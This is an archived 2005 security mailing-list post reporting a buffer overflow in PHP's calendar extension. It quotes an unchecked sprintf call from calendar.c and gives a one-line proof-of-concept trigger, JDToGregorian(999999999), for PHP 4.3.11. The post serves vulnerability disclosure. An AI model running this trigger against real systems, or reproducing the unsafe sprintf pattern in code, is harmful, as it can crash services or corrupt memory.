lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <000f01c57ad1$7aa5d8d0$de317dd4@m5p4gn9mltrevu2> Date: Mon Jun 27 05:34:25 2005 From: FistFuXXer at gmx.de (FistFucker) Subject: PHP: Calendar Buffer Overflow There are some nice sprintf()'s in "\ext\calendar\calendar.c": 'sprintf(date, "%i/%i/%i", month, day, year);' Example exploitation (4.3.11): <?php JDToGregorian(999999999); ?>